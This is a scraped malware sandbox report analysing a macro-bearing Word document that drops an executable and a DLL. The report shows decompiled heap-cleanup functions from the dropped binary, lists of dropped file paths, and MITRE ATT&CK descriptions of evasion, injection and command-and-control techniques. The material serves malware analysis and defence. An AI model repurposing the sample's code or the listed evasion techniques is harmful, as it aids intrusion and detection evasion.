					} else {
						_t47 = 0;
						E010045EB(_t30 + 8, 0);
						_t38 = _t30 + 0xc;
						_t19 = E010045EB(_t30 + 0xc, 0);
						if(_v12 != 0) {
							_t28 = GetLastError();
							_push(_v12);
							_t19 = E010029A8(_t38);
							SetLastError(_t28);
						}
						if( *0x1008404 == 0) {
							_t44 =  *0x1008410;
							if(_t44 == 0) {
								_t19 = _t47;
							} else {
								 *0x1009294();
								_t19 =  *_t44() & 0x000000ff;
							}
							if(_t19 == 0) {
								E01004A20(_t30 + 0x18);
								_t34 = _t30 + 8;
								E010048D2(_t30 + 8);
								if( *((intOrPtr*)(_t30 + 4)) != _t47) {
									_push( *((intOrPtr*)(_t30 + 4)));
									E01002981(_t30, _t34);
								}
								_t19 = HeapFree(GetProcessHeap(), _t47, _t30);
								L13:
								if(_t47 != 0) {
									_push(_t47);
									_t19 = E010029A8(_t34);
								}
							}
						}
					}
					_pop(_t43);
					_pop(_t48);
					_pop(_t31);
					return E01006160(_t19, _t31, _v8 ^ _t50, _t41, _t43, _t48);
				} else {
					return __eax;
				}
			}

0x01006c10
0x01006c10
0x01006c18
0x010047dc
0x010047de
0x010047df
0x010047e7
0x010047ed
0x010047f6
0x010047f9
0x01004800
0x01004803
0x01004805
0x01004891
0x00000000
0x0100480b
0x0100480b
0x01004811
0x01004817
0x0100481a
0x01004822
0x01004824
0x0100482a
0x0100482f
0x01004835
0x01004835
0x01004842
0x01004844
0x0100484c
0x0100485d
0x0100484e
0x01004850
0x01004858
0x01004858
0x01004861
0x01004866
0x0100486b
0x0100486e
0x01004876
0x01004878
0x0100487b
0x0100487b
0x01004889
0x01004894
0x01004896
0x01004898
0x01004899
0x01004899
0x01004896
0x01004861
0x01004842
0x010048a1
0x010048a2
0x010048a5
0x010048ae
0x01006c1e
0x01006c1e
0x01006c1e

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 01004824
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 01004835
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 01004882
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 01004889

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorHeapLast$FreeProcess
String ID:
API String ID: 1234203156-0
Opcode ID: f3032d2f27e37b48f4bc4b5bd777099ceed845a570df3ae977f4889802d55659
Instruction ID: fb87fb713b117d3ed35a9077b84b3341ac9d6f07b9863d99b19cb122d542771d
Opcode Fuzzy Hash: f3032d2f27e37b48f4bc4b5bd777099ceed845a570df3ae977f4889802d55659
Instruction Fuzzy Hash: DF21D6709001149FEB27EF64D8849BEBB68EF51205F044499FA8AC61CADF359E00C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 010047D9 Relevance: 5.1, APIs: 4, Instructions: 77
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E010047D9(int* __ecx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t18;
				long _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				void* _t42;
				intOrPtr* _t43;
				long _t46;
				void* _t47;
				signed int _t48;

				_push(__ecx);
				_push(__ecx);
				_v8 =  *0x1008018 ^ _t48;
				_t29 = __ecx;
				_t33 =  &(__ecx[1]);
				E01004A76( &(__ecx[1]), _t40,  &_v12);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t46 = _v12;
					L12:
					if(_t46 != 0) {
						_push(_t46);
						_t18 = E010029A8(_t33);
					}
					L14:
					_pop(_t42);
					_pop(_t47);
					_pop(_t30);
					return E01006160(_t18, _t30, _v8 ^ _t48, _t40, _t42, _t47);
				}
				_t46 = 0;
				E010045EB( &(__ecx[2]), 0);
				_t37 =  &(__ecx[3]);
				_t18 = E010045EB( &(__ecx[3]), 0);
				if(_v12 != 0) {
					_t27 = GetLastError();
					_push(_v12);
					_t18 = E010029A8(_t37);
					SetLastError(_t27);
				}
				if( *0x1008404 != 0) {
					goto L14;
				} else {
					_t43 =  *0x1008410;
					if(_t43 == 0) {
						_t18 = _t46;
					} else {
						 *0x1009294();
						_t18 =  *_t43() & 0x000000ff;
					}
					if(_t18 != 0) {
						goto L14;
					} else {
						E01004A20(_t29 + 0x18);
						_t33 = _t29 + 8;
						E010048D2(_t29 + 8);
						if( *((intOrPtr*)(_t29 + 4)) != _t46) {
							_push( *((intOrPtr*)(_t29 + 4)));
							E01002981(_t29, _t33);
						}
						_t18 = HeapFree(GetProcessHeap(), _t46, _t29);
						goto L12;
					}
				}
			}

0x010047de
0x010047df
0x010047e7
0x010047ed
0x010047f6
0x010047f9
0x01004800
0x01004803
0x01004805
0x01004891
0x01004894
0x01004896
0x01004898
0x01004899
0x01004899
0x0100489e
0x010048a1
0x010048a2
0x010048a5
0x010048ae
0x010048ae
0x0100480b
0x01004811
0x01004817
0x0100481a
0x01004822
0x01004824
0x0100482a
0x0100482f
0x01004835
0x01004835
0x01004842
0x00000000
0x01004844
0x01004844
0x0100484c
0x0100485d
0x0100484e
0x01004850
0x01004858
0x01004858
0x01004861
0x00000000
0x01004863
0x01004866
0x0100486b
0x0100486e
0x01004876
0x01004878
0x0100487b
0x0100487b
0x01004889
0x00000000
0x01004889
0x01004861

APIs

Part of subcall function 01004A76: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,00000000,?,01004701,?,?,?,00000000), ref: 01004A85

Part of subcall function 010045EB: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,?,010045CC,00000000,?,?,?,?,01002A3B,?,00000001,?), ref: 010045FB
Part of subcall function 010045EB: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,010045CC,00000000,?,?,?,?,01002A3B,?,00000001,?), ref: 0100460A

SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 01004835
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 01004824

Part of subcall function 010029A8: ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?), ref: 010029B0

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 01004882
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 01004889

Memory Dump Source

Source File: 00000002.00000002.273397244.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000002.00000002.273393362.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273406088.0000000001009000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.273445788.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1000000_rECA2.jbxd

Similarity

API ID: ErrorLast$Heap$FreeMutexObjectProcessReleaseSingleWait
String ID:
API String ID: 2060072361-0
Opcode ID: ec514bad060498013aeed44cfc3c432946a16bc9946b7cea08e083b6c772fd21
Instruction ID: e5234509ee0c34bafba38f9150a3ab23d2040bb1360e05eb05ffd41f147b56fb
Opcode Fuzzy Hash: ec514bad060498013aeed44cfc3c432946a16bc9946b7cea08e083b6c772fd21
Instruction Fuzzy Hash: 1B21F531900114EFEB27EF64D8849BEBB68EF51611F044499FA85DB1CADF359E00C7A5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report airequipmentcorp-doc-08.11.2022.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3A11B302-44CB-4EB9-BCB8-49C2BE307D7C

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2947CA03.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\2F6F238A.png

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{51DECAAA-E719-4ADB-922F-7BFC4F91483F}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C3FA9527-8571-4407-A5C8-BB633260A4AC}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rm[1].htm

C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe

C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll

C:\Users\user\AppData\Local\Temp\~DF32F8B01FD4175FF7.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\airequipmentcorp-doc-08.11.2022.doc.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

C:\Users\user\Desktop\~$requipmentcorp-doc-08.11.2022.doc

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/682577/sample/airequipmentcorp-doc-08.11.2022.doc"

Indicators

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 2740

Windows Analysis Report
airequipmentcorp-doc-08.11.2022.doc

Function 01003F9E Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 193
memorylibrarynativeCOMMON

Function 01005D14 Relevance: 10.6, APIs: 7, Instructions: 88
nativeCOMMON

Function 01003A94 Relevance: 7.6, APIs: 5, Instructions: 85
librarywindowCOMMON

Function 01005C96 Relevance: 4.6, APIs: 3, Instructions: 55
nativeCOMMON

Function 01003F00 Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Function 01006580 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 010058CA Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 262
COMMON

Function 01003938 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 107
processsynchronizationCOMMON

Function 0100371B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 117
fileCOMMON

Function 01005F35 Relevance: 10.6, APIs: 7, Instructions: 132
sleepCOMMON

Function 0100387E Relevance: 9.1, APIs: 6, Instructions: 69
fileCOMMON

Function 01003C8D Relevance: 6.1, APIs: 4, Instructions: 109
memoryCOMMON